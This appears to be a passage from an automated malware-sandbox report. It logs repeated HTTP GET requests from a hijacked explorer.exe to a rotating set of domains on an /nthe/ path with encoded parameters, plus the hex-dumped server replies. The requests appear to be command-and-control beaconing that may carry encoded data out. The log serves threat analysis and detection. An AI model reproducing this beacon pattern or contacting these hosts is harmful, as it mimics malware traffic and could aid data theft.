                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      10192.168.2.224918534.98.99.3080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:20.496011972 CEST606OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:20.611011028 CEST607INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      11192.168.2.224918634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:30.639823914 CEST607OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:30.756135941 CEST608INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      12192.168.2.224919134.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:05.497116089 CEST614OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:05.612250090 CEST615INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      13192.168.2.224919534.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:43.718801022 CEST618OUTGET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:43.833789110 CEST618INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      14192.168.2.224919734.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:53.937608004 CEST620OUTGET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:54.053649902 CEST620INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:53 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      15192.168.2.2249198192.99.131.25280C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:59.159507036 CEST621OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:59.269926071 CEST622INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:22:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      16192.168.2.224919934.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:23:04.295397043 CEST622OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:04.410657883 CEST623INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:04 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      17192.168.2.224920034.98.99.3080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:23:09.429909945 CEST623OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:09.545253038 CEST624INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.224916934.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:18:05.019635916 CEST586OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:05.138832092 CEST587INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.224917034.98.99.3080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:18:10.217118979 CEST588OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:10.331685066 CEST588INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.224917134.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:18:20.416021109 CEST589OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:20.531202078 CEST590INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
